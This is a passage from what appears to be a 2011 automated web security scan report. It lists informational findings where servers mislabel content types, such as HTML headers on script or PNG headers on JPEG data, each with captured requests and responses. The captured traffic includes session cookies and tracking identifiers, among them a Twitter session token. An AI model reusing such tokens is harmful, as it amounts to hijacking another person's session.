Referer: http://www.phuket-travel.com/premium-packages/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_cc=true; s_evar38=AWDINP1356; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.2.10.1308921743; s_sq=wotifcom-awd-global-prd%3D%2526pid%253Dphuket-travel.com%25253Atours%25253Athailand%25253Aphuket%25253Aphuket%252520tours%252520%252526%252520travel%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket-travel.com/premium-packages/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:44 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 24 Jun 2011 01:18:46 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:44 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 89532
Content-Type: text/html


<!--[if lte IE 6]><script language="JavaScript" src="/scripts/ie6menu.js"><script language="JavaScript" src="/scripts/ie6hidelogo.js"></script><script type="text/javascript" src="/scripts/pngfix.js">
...[SNIP]...
29. Content type incorrectly stated  previous  next
There are 61 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-00_11394222771308922260; expires=Wed, 22-Jun-2016 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11394222771308922260; expires=Fri, 24-Jun-2011 13:46:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6651
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
29.2. http://a.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.netmng.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=244&tax=par HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_ii=rTeHHM8FxVXlMQtFpDbXwORJ34l%2Fv1YYJAemg0C6NzdfuMmQ7WJ%2F5pF%2FuEjoxoP2hR6hCc9xW5BuJ1voxxjDzHeonAdyaBOQeyplESkXfnYj7LfR14NPm2L%2FC%2F7q13jF; evo5=csmq4atf04cxa%7Cyyg8%2BAquYajlyU38mbKfM6zzAAi91YoxCASmOO%2F6vslaz3Wz6SAb7WNSoJ42tqPjZBZm%2BwU7nz%2BqSaZkPum3%2BCcVtWs4kWprLiUT69hq%2BB7egueH9fmWFooawy%2FIlN07%2FywLbqigg1lXylCtaXnEdSXrSN%2BG6wl4qKM0pyjpXM7wDjjF%2FTnaw27LAO86PDR8rVQBsHkjHYPXkvQDaVu1cNDOjedkku9rP5M4aXEKwkdj4GS5v130Su5DukdLRdsllQxY%2B7lxFgDjvyHHxdnOJN0dE%2F4NbWDBdda3%2BTZ9xk2kRE4siiSl%2FES6mcPHsh5QYNe%2B3r%2BixhOSblhWvWuhng4yHSIxh%2FdseAuHpAB4bgzwOQgOQtu6mRAPuh3ZeeWE4ftB5QnNagzzBV6tjFj2Gx16lEDbzzYwMXeK3q5f6XdSiNsf7FIJww9fjsd4IIexvm8cX3okZybYL6im77R%2Fm6D%2Biy0lxPC8bFKQsAI777CENYtplCK92RelBIxTakV2KZ9zjQZSBLVArtq%2Bd3A8brImrUXwY47CZCPMyU3E7HGBv5tRNsvK5locqtXgvWrgSFbQU%2FS7P2yi6Tu5HqAksMuAf7uFBpCtKBX0SbhRUzjxprR%2Bdzt3S5q1OPrunUWDaTyE%2FfH2xdVd9zwp8epdDU3YBru1Z4Bpl9GYvlnLLFyLJgKqp%2F2hzCYMa%2BYiQ0ZuhV1QwKhaQNvGQTe6134KX2JdCP%2BuD8wI%2FlVlbm5EPzEufUaBJmtDn8HMCishvBcS

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:58 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 23 Jun 2011 02:10:58 GMT
Last-Modified: Thu, 23 Jun 2011 02:10:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CcUXouB4rLUo4z%2FFKqv9TTqetSZc6URjOUkrEwZxL19iFoM3B6TaCLVGSPl4YcBy8M5VAiHvrOT0p0MJYOkmTpDIOg2x6eeiUsYim2C5zms%2BvrRLQn%2FoybFZANl57jMSeqLSZr0cDlofYcqgbyhV3RKv1yXyCctLJPQejPFuG%2FSTaq20qktFEGeqalakL5cpnxnT9tbUjhJLDFmel2Kl7C%2B5z4szEshst11JdDKJH9eq%2BoqpkDMROMNvFjfMDpfNItKW%2FvjCiL3RPcp47TxOLhJ1Q2YxLnIEZhyzUPf2LGOE6tEXu99zJEid0dKnMpG%2Bt9tIdB8UM95tAZHMW4LcN96ZflsymOkOyFv%2F1NsyGKFpkir%2Bjuwdzi7qcC%2FUA0hVVE9G7U9zUMou5%2Bbc2a66HREcxgoJ%2BDYN1%2Bhl0najue0Mcc2UFyncDi8SA02XiMCyX0QJt1ZGMqincsgjg4PvOacguI41%2FRN9FLR0lJOwU0vGk7GnXdTKda3JAzbk22zhYUV2US7JJuCxrTdVyzrTwrXTOQRiQNUhR79O7q641BJrqJ1WoKm3ej57gnXAZz6Ea6eF4VqJJZafHUjoVvCR4%2FzbKbaCZ6W6F2FV54q3JzisnJLOIeRfLB8wzZ2Yl%2Bvao5sI%2BQsCZtivHP%2BZMXU4rAiUKToqmTb9NqrSxuxywPEfo2vtC%2FlqOA09MEIfqXMW%2Bzo1PK9bgH7HezrWA467f7Y0maS7n%2FbXXPRcfp3kGW0ejb6ZBA%2B2%2F1ebBdFEbxJtE; expires=Sun, 25-Dec-2011 02:10:58 GMT; path=/; domain=.netmng.com
Content-Length: 688
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=38143;sz=1x1;ord=1?'; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.bo
...[SNIP]...
29.3. http://a3.twimg.com/profile_images/58727890/PIA08370_normal.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a3.twimg.com
Path:   /profile_images/58727890/PIA08370_normal.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /profile_images/58727890/PIA08370_normal.png HTTP/1.1
Host: a3.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:43 GMT
Expires: Wed, 01 May 2019 16:09:41 GMT
Last-Modified: Fri, 22 Aug 2008 17:38:54 GMT
Cache-Control: max-age=252460800
Content-Type: image/png
ETag: "1cbb8858793bc2c96937575a188fe016"
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: c4269458941472564db22fbf7d6aa4c410a6c04f0a90906218ac480175849b1932af346945b54838,826cdaa5f6589d2e3ca588c761b9244ed31065ada9f85bedfa6040c6f0bb2fcea9c379e9d0a2cb41
x-amz-id-2: 5v3fGW5xN7T4rKOCR7sdtSxjxJACCmkvsO5Ma5HXlN54C1QrC8PMFs3DKSSKlvQA
x-amz-request-id: 7F293E4BC50522E7
X-Cache: Hit from cloudfront
Content-Length: 795

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......0.0.."..............................
...[SNIP]...
29.4. http://api.twitter.com/1/urls/resolve.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/urls/resolve.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/urls/resolve.json?urls%5B%5D=http%3A%2F%2Fow.ly%2F5oKRS&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oKy4&urls%5B%5D=http%3A%2F%2Fow.ly%2F5ofOD&urls%5B%5D=http%3A%2F%2Fow.ly%2F5ofnG&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oflE&urls%5B%5D=http%3A%2F%2Fow.ly%2F5of3j&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oeXg&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oeNB&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oa4Y&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o5k9&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o4YM&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o4Jj&urls%5B%5D=http%3A%2F%2Fbit.ly%2Fl0x4zn HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130796296639680752; k=173.193.214.243.1308571866345827; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; __utmc=43838368; __utmb=43838368.2.10.1308923300; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vYXNrZWFz%250AdXBwb3J0Og9jcmVhdGVkX2F0bCsIroPowTAB--53c908b5ac5e9523bb449b7c77acdfe7d28a8eac

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923447-17753-60906
X-RateLimit-Limit: 1000
ETag: "62bd892d49144959eee88efaaacc609a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:50:47 GMT
X-RateLimit-Remaining: 955
X-Runtime: 0.01192
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114508b243d
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4574163279f6bcccd0daeaf1111869debe1ca4fd
X-RateLimit-Reset: 1308926900
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vYXNrZWFz%250AdXBwb3J0Og9jcmVhdGVkX2F0bCsIroPowTAB--53c908b5ac5e9523bb449b7c77acdfe7d28a8eac; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 945
Connection: close

{"http:\/\/ow.ly\/5of3j":"http:\/\/support.ea.com\/","http:\/\/ow.ly\/5o4YM":"http:\/\/support.ea.com\/","http:\/\/ow.ly\/5oflE":"http:\/\/support.eamobile.com\/","http:\/\/ow.ly\/5o4Jj":"http:\/\/sup
...[SNIP]...
29.5. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1308922038899 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1308922027%2E341%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:32:13 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");
29.6. http://cdn.wn.com/or/images/icons/edit24x24.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.wn.com
Path:   /or/images/icons/edit24x24.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /or/images/icons/edit24x24.png HTTP/1.1
Host: cdn.wn.com
Proxy-Connection: keep-alive
Referer: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=67; __unam=6e7de7f-130c1d53330-7dd7c096-1

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Type: image/png
Date: Fri, 24 Jun 2011 13:27:19 GMT
ETag: "3500856996"
Expires: Fri, 08 Jul 2011 13:27:19 GMT
Last-Modified: Mon, 14 Feb 2011 13:11:34 GMT
Server: ECS (dca/5328)
Via: 1.0 cdnorigin.wn.com (squid/3.1.11)
Warning: 113 cdnorigin.wn.com (squid/3.1.11) This cache hit is still fresh and more than 1 day old
X-Cache: HIT
X-Cache-Lookup: HIT from cdnorigin.wn.com:80
Content-Length: 604

GIF89a.....M....../.....[..Z..^..\.._..b..1..3..d..m........s...........~.....o..l...........m..g..2..3...........4..a*"....../...........^....y'........]..*..b.....l.....d..d.....r..in\@..g..\..+....
...[SNIP]...
29.7. http://cdn.wn.com/or/js/hyphenator_en-2.5.0.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.wn.com
Path:   /or/js/hyphenator_en-2.5.0.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /or/js/hyphenator_en-2.5.0.min.js HTTP/1.1
Host: cdn.wn.com
Proxy-Connection: keep-alive
Referer: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Type: application/javascript
Date: Fri, 24 Jun 2011 13:32:06 GMT
ETag: "2826170019"
Expires: Fri, 08 Jul 2011 13:32:06 GMT
Last-Modified: Tue, 06 Apr 2010 12:42:37 GMT
Server: ECS (dca/532D)
Via: 1.0 cdnorigin.wn.com (squid/3.1.11)
Warning: 113 cdnorigin.wn.com (squid/3.1.11) This cache hit is still fresh and more than 1 day old
X-Cache: HIT
X-Cache-Lookup: HIT from cdnorigin.wn.com:80
Content-Length: 39172

/*
* Hyphenator 2.5.0 - client side hyphenation for webbrowsers
* Copyright (C) 2010 Mathias Nater, Z..rich (mathias at mnn dot ch)
* Project and Source hosted on http://code.google.com/p/hyphe
...[SNIP]...
29.8. http://content.pulse360.com/43AE06D6-306A-11E0-9FBF-51F23F5BF877  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /43AE06D6-306A-11E0-9FBF-51F23F5BF877

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /43AE06D6-306A-11E0-9FBF-51F23F5BF877 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:39 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 9599

document.write('<style type="text/css"> div#p360-hybrid160x600aquabulge-43AE06D6-306A-11E0-9FBF-51F23F5BF877 { width: 160px; left: 0; font-family: sans-serif; position: relative; display
...[SNIP]...
29.9. http://content.pulse360.com/F81E71FC-348C-11E0-8455-C9C5E4064C68  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /F81E71FC-348C-11E0-8455-C9C5E4064C68

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /F81E71FC-348C-11E0-8455-C9C5E4064C68 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:39 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 10071

document.write('<style type="text/css"> div#p360-hybrid550x250TriadBlackBlue-F81E71FC-348C-11E0-8455-C9C5E4064C68 { width: 550px; left: 0; font-family: sans-serif; position: relative; di
...[SNIP]...
29.10. http://display.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=244&tax=par HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:54 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:54 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:54 GMT
Content-Length: 198
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
29.11. http://drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=187719549.1305634156.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=187719549.2012725843.1305634156.1305634156.1305634156.1; op537homegum=a00602v02x2767i12d29vaf31; fcP=C=0&T=1307494967295&DTO=1307494967291&U=219129329&V=1307494967291

Response

HTTP/1.1 200 OK
ETag: "25be-4dba31b4"
Content-Type: text/plain
Last-Modified: Fri, 29 Apr 2011 03:34:12 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=1680;ecid=97237281161,0)
Content-Length: 9662
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app57
Accept-Ranges: bytes
Cache-Control: max-age=82144
Expires: Sat, 25 Jun 2011 12:33:10 GMT
Date: Fri, 24 Jun 2011 13:44:06 GMT
Connection: close

......00.... ..%......(...0...`..... ......%..................................................................................................................!Z..!Z..!Z................................
...[SNIP]...
29.12. http://drh2.img.digitalriver.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drh2.img.digitalriver.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: drh2.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
ETag: "37e-4b6b21a0"
Content-Type: text/plain
Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=17860;ecid=21659529828,0)
Content-Length: 894
